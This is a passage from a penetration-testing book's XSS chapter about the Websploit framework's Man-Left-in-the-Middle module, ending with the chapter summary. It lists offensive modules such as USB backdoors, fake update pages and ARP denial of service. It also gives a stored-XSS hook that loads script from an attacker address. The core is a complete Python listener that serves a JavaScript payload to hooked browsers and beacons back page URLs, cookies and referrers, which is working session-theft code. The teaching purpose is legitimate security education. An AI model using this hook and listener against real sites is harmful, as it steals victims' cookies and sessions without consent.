Metasploit's scope for scanning and exploitation is staggering, and with its open extension through plugins and modules it has earned a well-deserved reputation for versatility and power. Sometimes, however, you are looking for a web application focus, and this is where a similar open-source framework called Websploit (https://sourceforge.net/p/websploit/wiki/Home/) comes into play. Just like Metasploit, it offers a command-line approach to calling and loading modules. It also shares the extensibility through plugins and modules that has helped Metasploit stay at the forefront of pen testing tools, but instead of being an all-inclusive suite, it focuses on many of the vulnerabilities specific to our role as web penetration testers and ethical hackers.
The list of modules and plugins from its wiki is a big giveaway as to its purpose:
Autopwn: Borrowed from Metasploit; scans and exploits target services/servers
wmap: Scans or crawls targets; borrowed from the Metasploit wmap plugin
Format infector: Injects reverse and bind payloads into a file format
Phpmyadmin: Searches for the target's phpMyAdmin login page
lfi: Scans for local file inclusion vulns and bypasses some WAFs
Apache users: Searches for user directories on a server (when used with Apache web servers)
Dir Bruter: Brute forces target directories with a wordlist
Admin finder: Searches for the admin and login pages of a target
Java applet attack: Java signed applet attack
MFOD attack vector: Middle Finger of Doom attack vector
USB infection attack: Creates an executable backdoor for infecting USB drives on Windows
ARP DOS: ARP cache Denial of Service attack with random MACs
Web killer attack: Takes a website down on the local network (TCPKILL)
Fake update attack: Creates a fake update page for the target OS
Fake access point attack: Creates a fake AP and sniffs victims' information
As this chapter is all about XSS, the DOM-based Man Left in the Middle (MLITM) attack is the module we are after, so let's take a look at how we leverage it. You'll want to download the latest version, extract it from the tarball, and then run the install script.
Once it's installed, we can simply invoke the websploit command from a terminal session to start Websploit. From there, we'll want to use network/mlitm. As modules go, you don't get simpler than the MLITM tool. There are no options to set: the module consists of a listening web server (similar to a handler) and a Python script (thebiz.py) that acts as the default payload. You can certainly craft other payloads, but much like any XSS attack, our goal is to place a script somewhere in the user's path that they trust, and then use it to redirect their browser to our attacking server, where the payload is served from and information can be harvested or actions orchestrated.
The script I used in this attack was pretty simple: we want to introduce the victim's browser to our C2 server/attack box and let the web server that Websploit runs for this purpose (on its default port of 8000) deliver the payload and establish our channel:
<script src=http://172.16.30.128:8000></script>
We place this in the same blog entry field we've used before, and before you know it, an unlucky victim comes along and loads that entry (as shown in the following screenshot):
Script entry and appearance to victims – simple but effective.
On our Kali box, we can see that we are delivering the payload and observing the user's traffic via the referring link (the Referer header on the request tells us which page the victim loaded our hook from), as the following screenshot shows. From here, feel free to experiment with payload alterations to achieve some of the control we've seen in other tools.
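To make the mechanics concrete, here is a small MLITM-style listener written for this page; it is an added illustration, not Websploit's own code or its thebiz.py payload. It reuses the attacker address from the hook above (172.16.30.128:8000) and assumes a /beacon callback path of its own choosing. A stored <script src=...> hook makes the victim's browser fetch the listener's root, which serves a JavaScript payload; the first hit exposes the Referer header, and the payload then beacons the page URL, non-HttpOnly cookies and referrer back as a GET:

```python
"""MLITM-style listener, added as an example (not Websploit's code).

Hostnames, ports and the /beacon path are assumptions for this example.
"""
import json
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

C2_HOST = "172.16.30.128"   # attacker box, as in the page's hook
C2_PORT = 8000              # Websploit's MLITM default port


def hook_tag(host: str = C2_HOST, port: int = C2_PORT) -> str:
    """The stored-XSS hook we drop into the blog entry field."""
    return f'<script src="http://{host}:{port}/"></script>'


def payload_js(host: str = C2_HOST, port: int = C2_PORT) -> str:
    """JavaScript served to the hooked browser. An Image() GET is used for the
    beacon because image loads are not blocked cross-origin and need no CORS
    preflight; document.cookie cannot read HttpOnly cookies."""
    return f"""
(function () {{
  var q = "u=" + encodeURIComponent(location.href) +
          "&c=" + encodeURIComponent(document.cookie) +
          "&r=" + encodeURIComponent(document.referrer);
  new Image().src = "http://{host}:{port}/beacon?" + q;
}})();
"""


def parse_beacon(path: str) -> dict:
    """Turn /beacon?u=...&c=...&r=... into a record; absent keys become ''."""
    qs = parse_qs(urlparse(path).query)
    return {k: qs.get(k, [""])[0] for k in ("u", "c", "r")}


class MlitmHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        referer = self.headers.get("Referer", "")
        if self.path.startswith("/beacon"):
            record = parse_beacon(self.path)
            record["referer"] = referer
            print("[beacon]", json.dumps(record))
            self._send(204, b"", "text/plain")
        else:
            # First contact: the Referer reveals where the hook was planted.
            print("[hook] payload fetched from", referer or "(no referer)")
            self._send(200, payload_js().encode(), "application/javascript")

    def _send(self, status, body, ctype):
        self.send_response(status)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep stdout to our own lines
        pass


if __name__ == "__main__":
    print("hook to plant:", hook_tag())
    HTTPServer(("0.0.0.0", C2_PORT), MlitmHandler).serve_forever()
```

Run it on the attack box, plant the printed hook in the vulnerable field, and the beacon lines show the victim's page and cookies as they arrive. Because the beacon rides on a plain GET, it is visible in any proxy or web server log on the victim's side; a real engagement payload would want a quieter channel, and a session cookie marked HttpOnly will not appear in the c field at all.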
Websploit is a strong tool in other areas of the attack chain, and it does well with blended attack modules such as AutoPwn, DoS, and its WiFi-focused attacks. For XSS, I find that Metasploit offers more versatility in managing payloads and offering shell options. In addition to Meterpreter, there are more than a dozen other shell options depending on what your targets can get away with and what mix of stealth and functionality is desired.
Summary
XSS attacks have been a thorn in the side of security professionals and millions of victims since the explosion in dynamic content brought JavaScript to the forefront of web development. Coupled with an antiquated means of establishing trust (entity-based, with no validation of input), this has kept XSS on the OWASP Top 10 for over 10 years. It is clear that something should be done to bring more attention to it, and it is the increased use of pen testing that can make the difference.
The tools for XSS are many, and while we covered some of the more accessible tools Kali includes here, it became obvious to me in preparing to write this chapter that the toolsets experience some ebb and flow; some tools have fallen out of favor over time while others keep on fighting. Some of this might be attributed to corporate sponsorship: Rapid7 is a key player in maintaining and sponsoring Metasploit, while XSSer and Websploit have both been sporadically supported. I would encourage delving into each of these tools, and others, as much as you can to get a good feel for which ones should be in your tool chest. It would be wise to have at least two tools for every role, with different strengths and overlapping capabilities, to better cover corner-case scenarios.
In this chapter, we covered the types of XSS, their potential to do harm or help us in our pursuit of pwnership (hacker-speak for being able to compromise a site or target at will), and some great ways to use them to gain visibility into clients and their relationships with their server. XSS, as we also saw, can provide real black-hat attackers with a sinister foothold that allows them to manipulate system resources and spy on their victims. Where XSS focuses on exploiting the client-server trusted relationship to compromise the client, our next chapter will discuss both client-side attacks as well as how we can take advantage of that same trusted relationship to either control or coerce the server itself. These attacks are known broadly as injection attacks, and encompass some hot topics in the land of web application security such as HTML, SQL, XML, and even the oft-overlooked LDAP. At the conclusion of the next chapter, you will have a solid foundation of attacks to help find critical data leakage and host control vulns in the majority of applications and their clients.